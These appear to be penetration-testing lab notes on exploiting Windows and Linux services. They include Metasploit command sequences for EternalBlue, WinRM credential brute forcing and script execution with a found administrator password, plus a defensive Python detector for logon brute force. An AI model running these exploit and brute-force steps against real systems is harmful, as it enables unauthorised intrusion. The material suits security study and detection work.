
Exploitation

Windows Exploitation

HFS (HTTP File Server)

HFS (HTTP File Server) is a file- and document-sharing web server.

  • Rejetto HFS - free open source HTTP file server

🔬 HFS - MSF Exploit

SMB - MS17-010 EternalBlue

  • CVE-2017-0144
  • EternalBlue VA
    • EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
    • Patch was released in March 2017

🔬 Check the Lab 2 - Eternal Blue here

  • Some useful MSF commands from my home lab (Kali VM + Windows Server 2008 R2)

service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.168.31.131
setg RHOST 192.168.31.131
workspace -a EternalBlue

db_nmap -sS -sV -O 192.168.31.131
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
options
run

search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
options
run

WinRM

  • Identify WinRM users with MSF, then exploit WinRM with the credentials obtained.
  • WinRM's default ports are 5985 for HTTP and 5986 for HTTPS.

🔬 WinRM Attack lab

service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.27.173
setg RHOST 10.2.27.173
workspace -a WinRM

db_nmap -sS -sV -O -p- 10.2.27.173
# Port 5985 is set up for WinRM
search type:auxiliary winrm
use auxiliary/scanner/winrm/winrm_auth_methods
options
run

# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run

search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
run

search winrm_script
use exploit/windows/winrm/winrm_script_exec
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
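From the defender's side the credential brute force above is noisy: every guess is a failed network logon (Event ID 4625, logon type 3) from a single source, and a hit shows up as a 4624 from the same source shortly after. As an added example, not part of the original notes, this detector runs a sliding window over constructed sample event records and flags a source with a burst of failures across many usernames followed by a success; the flattened record format and all values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): Security events flattened to
# "timestamp|EventID|LogonType|TargetUserName|IpAddress". 4625 = failed logon,
# 4624 = successful logon; logon type 3 = network logon, which is what WinRM
# (and SMB) authentication produces. "-" means no source address recorded.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01|4625|3|administrator|10.2.27.50
2024-05-01T10:00:02|4625|3|administrator|10.2.27.50
2024-05-01T10:00:02|4625|3|admin|10.2.27.50
2024-05-01T10:00:03|4625|3|root|10.2.27.50
2024-05-01T10:00:04|4625|3|guest|10.2.27.50
2024-05-01T10:00:05|4625|3|test|10.2.27.50
2024-05-01T10:00:09|4624|3|administrator|10.2.27.50
2024-05-01T10:03:00|4625|3|jsmith|10.2.27.60
2024-05-01T11:00:00|4625|3|jsmith|10.2.27.60
2024-05-01T11:00:30|4624|2|jsmith|-"""

def parse_events(text):
    """Parse the flattened records into dicts sorted by timestamp."""
    events = []
    for line in text.splitlines():
        ts, eid, ltype, user, ip = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "event_id": int(eid),
                       "logon_type": int(ltype), "user": user, "ip": ip})
    return sorted(events, key=lambda e: e["ts"])

def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1),
                      success_grace=timedelta(minutes=5)):
    """Flag source IPs with >= threshold type-3 failures inside `window`.
    Returns {ip: {"failures": n, "users": [...], "success_after": bool}}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["ip"] != "-":
            by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["event_id"] == 4625]
        # Slide a window anchored at each failure; stop at the first burst.
        for i in range(len(fails)):
            burst = [f for f in fails[i:] if f["ts"] - fails[i]["ts"] <= window]
            if len(burst) >= threshold:
                end = burst[-1]["ts"]
                success = any(e["event_id"] == 4624 and end <= e["ts"] <= end + success_grace
                              for e in evs)
                alerts[ip] = {"failures": len(burst),
                              "users": sorted({f["user"] for f in burst}),
                              "success_after": success}
                break
    return alerts
```

Tune `threshold` and `window` to the environment's normal failure rate; a burst that ends in `success_after == True` is the case to triage first.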

Apache Tomcat

Apache Tomcat is a free, open source Java servlet web server, built to host dynamic websites and web apps developed in Java.

  • Tomcat's default TCP port is 8080
  • The Apache HTTP Server, by contrast, hosts HTML/PHP web apps
  • Apache Tomcat versions before 8.5.23 are vulnerable to a JSP upload bypass leading to RCE

🔬 Tomcat - MSF Exploit

Linux Exploitation

FTP

vsftpd is a Unix FTP server.

  • vsftpd v.2.3.4 is vulnerable to command execution

🔬 FTP - MSF Exploit

SAMBA

Samba is the Linux implementation of SMB.

  • Samba v.3.5.0 is vulnerable to RCE

🔬 Samba - MSF Exploit

SSH

libssh is a C library that implements the SSHv2 protocol.

  • SSH's default TCP port is 22
  • libssh versions 0.6.0 through 0.8.0 are vulnerable to an authentication bypass

🔬 SSH - MSF Exploit

SMTP

Haraka is an open source, high-performance SMTP server developed in Node.js.

  • SMTP's default TCP port is 25
    • other common TCP ports are 465 and 587
  • Haraka versions prior to 2.8.9 are vulnerable to command injection

🔬 SMTP - MSF Exploit